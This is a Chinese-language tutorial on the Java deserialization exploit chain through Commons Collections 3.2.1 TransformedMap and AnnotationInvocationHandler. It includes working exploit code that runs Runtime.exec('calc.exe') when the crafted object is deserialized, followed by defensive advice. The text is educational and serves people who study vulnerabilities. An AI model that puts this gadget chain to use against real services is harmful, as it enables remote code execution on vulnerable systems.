Java反序列化漏洞分析：CommonsCollections-TransformedMap链利用<\/h1>

一、环境准备<\/h2>

1. Java版本要求<\/h3>

Java版本<\/strong>：必须使用Java 8u71之前的版本（推荐使用Java 8u65）<\/li>

下载地址<\/strong>：

Oracle Java 8存档页面（中文）：https:\/\/www.oracle.com\/cn\/java\/technologies\/javase\/javase8-archive-downloads.html<\/li>
Oracle Java 8存档页面（英文）：https:\/\/www.oracle.com\/java\/technologies\/javase\/javase8-archive-downloads.html<\/li> <\/ul> <\/li> <\/ul>

注意<\/strong>：在下载页面搜索特定版本（如8u65）时可能会下载到错误版本（如8u111），需要多次尝试确认。<\/p> <\/blockquote>
2. 源码配置<\/h3>

下载JDK 8u65源码：https:\/\/hg.openjdk.org\/jdk8u\/jdk8u\/jdk\/rev\/af660750b2f4<\/li>
解压后找到目录：src\/share\/classes\/sun<\/code><\/li>
将sun包内容复制到Java 8u65的src目录中<\/li>
在IDEA中配置sourcepath指向src目录<\/li> <\/ol> 3. Maven依赖<\/h3> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>junit<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>junit<\/artifactId><\/span> <\/span><\/span> <version><\/span>4.13.2<\/version><\/span> <\/span><\/span> <scope><\/span>test<\/scope><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>二、漏洞利用链分析<\/h2> 1. 完整利用链<\/h3> ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() LazyMap.get() ChainedTransformer.transform() ConstantTransformer.transform() InvokerTransformer.transform() Method.invoke() Class.getMethod() InvokerTransformer.transform() Method.invoke() Runtime.getRuntime() InvokerTransformer.transform() Method.invoke() Runtime.exec() <\/code><\/pre> 2. 核心组件分析<\/h3> (1) InvokerTransformer类<\/h4> 位于org.apache.commons.collections.functors.InvokerTransformer<\/code>，实现了Transformer接口：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>NoSuchMethodException ex)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>构造函数：<\/p> public<\/span> InvokerTransformer<\/span>(<\/span>String methodName,<\/span> Class[]<\/span> paramTypes,<\/span> Object[]<\/span> args)<\/span> {<\/span> <\/span><\/span> super<\/span>();<\/span> <\/span><\/span> iMethodName =<\/span> methodName;<\/span> <\/span><\/span> iParamTypes =<\/span> paramTypes;<\/span> <\/span><\/span> iArgs =<\/span> args;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>示例利用：<\/p> @Test<\/span> <\/span><\/span>public<\/span> void<\/span> test1<\/span>()<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>}<\/span> <\/span><\/span> );<\/span> <\/span><\/span> invokerTransformer.<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>(2) TransformedMap类<\/h4> 位于org.apache.commons.collections.map.TransformedMap<\/code>，关键方法：<\/p> protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>构造方法：<\/p> protected<\/span> TransformedMap<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span> <\/span><\/span> super<\/span>(<\/span>map);<\/span> <\/span><\/span> this<\/span>.<\/span>keyTransformer<\/span> =<\/span> keyTransformer;<\/span> <\/span><\/span> this<\/span>.<\/span>valueTransformer<\/span> =<\/span> valueTransformer;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>工厂方法：<\/p> public<\/span> static<\/span> Map decorate<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span> <\/span><\/span> return<\/span> new<\/span> TransformedMap(<\/span>map,<\/span> keyTransformer,<\/span> valueTransformer);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>(3) MapEntry类<\/h4> 位于AbstractInputCheckedMapDecorator<\/code>内部类：<\/p> static<\/span> class<\/span> MapEntry<\/span> extends<\/span> AbstractMapEntryDecorator {<\/span> <\/span><\/span> public<\/span> Object setValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> value =<\/span> parent.<\/span>checkSetValue<\/span>(<\/span>value);<\/span> <\/span><\/span> return<\/span> entry.<\/span>setValue<\/span>(<\/span>value);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>(4) AnnotationInvocationHandler类<\/h4> 位于sun.reflect.annotation.AnnotationInvocationHandler<\/code>，关键反序列化方法：<\/p> private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span> throws<\/span> java.<\/span>io<\/span>.<\/span>IOException<\/span>,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> s.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span> <\/span><\/span> String name =<\/span> memberValue.<\/span>getKey<\/span>();<\/span> <\/span><\/span> Class<?><\/span> memberType =<\/span> memberTypes.<\/span>get<\/span>(<\/span>name);<\/span> <\/span><\/span> if<\/span> (<\/span>memberType !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> Object value =<\/span> memberValue.<\/span>getValue<\/span>();<\/span> <\/span><\/span> if<\/span> (!(<\/span>memberType.<\/span>isInstance<\/span>(<\/span>value)<\/span> ||<\/span> value instanceof<\/span> ExceptionProxy))<\/span> {<\/span> <\/span><\/span> memberValue.<\/span>setValue<\/span>(<\/span>new<\/span> AnnotationTypeMismatchExceptionProxy(...));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、完整利用过程<\/h2> 1. 构造Transformer链<\/h3> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> \/\/ 获取Runtime.class <\/span><\/span><\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> \/\/ 获取getRuntime方法 <\/span><\/span><\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> \/\/ 调用getRuntime() <\/span><\/span><\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> \/\/ 调用exec() <\/span><\/span><\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc.exe"<\/span>})<\/span> <\/span><\/span>});<\/span> <\/span><\/span><\/code><\/pre>2. 构造恶意Map<\/h3> HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "value"<\/span>);<\/span> \/\/ 必须使用"value"作为key <\/span><\/span><\/span><\/span>Map<<\/span>String,<\/span> Object><\/span> decorated =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>hashMap,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span><\/code><\/pre>3. 创建AnnotationInvocationHandler实例<\/h3> Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor<?><\/span> constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorated);<\/span> <\/span><\/span><\/code><\/pre>4. 序列化与反序列化触发<\/h3> \/\/ 序列化 <\/span><\/span><\/span><\/span>serializable(<\/span>o);<\/span> <\/span><\/span>\/\/ 反序列化触发漏洞 <\/span><\/span><\/span><\/span>unserializable(<\/span>"ser.bin"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>四、关键点解析<\/h2> 为什么使用"value"作为key<\/strong>：<\/p> AnnotationInvocationHandler<\/code>会检查key是否存在于memberTypes<\/code>中<\/li> 使用Target.class<\/code>时，memberTypes<\/code>包含value<\/code>键<\/li> <\/ul> <\/li> 绕过Runtime不可序列化问题<\/strong>：<\/p> 使用Runtime.class<\/code>代替Runtime.getRuntime()<\/code><\/li> 通过反射链动态获取Runtime实例<\/li> <\/ul> <\/li> Transformer链执行顺序<\/strong>：<\/p> ConstantTransformer<\/code>提供初始对象（Runtime.class）<\/li> 第一个InvokerTransformer<\/code>获取getRuntime<\/code>方法<\/li> 第二个InvokerTransformer<\/code>调用getRuntime()<\/code><\/li> 第三个InvokerTransformer<\/code>调用exec()<\/code><\/li> <\/ul> <\/li> 触发条件<\/strong>：<\/p> 反序列化时AnnotationInvocationHandler.readObject()<\/code>被调用<\/li> 遍历Map时会调用setValue()<\/code>方法<\/li> setValue()<\/code>触发Transformer.transform()<\/code>链式调用<\/li> <\/ul> <\/li> <\/ol> 五、防御建议<\/h2> 升级Commons Collections到安全版本（3.2.2+）<\/li> 升级Java到8u71及以上版本<\/li> 使用反序列化过滤器（ObjectInputFilter）<\/li> 避免反序列化不可信数据<\/li> <\/ol> 注意<\/strong>：此漏洞在Java 8u71后被修复，因为AnnotationInvocationHandler.readObject()<\/code>的实现发生了变化。<\/p> <\/blockquote>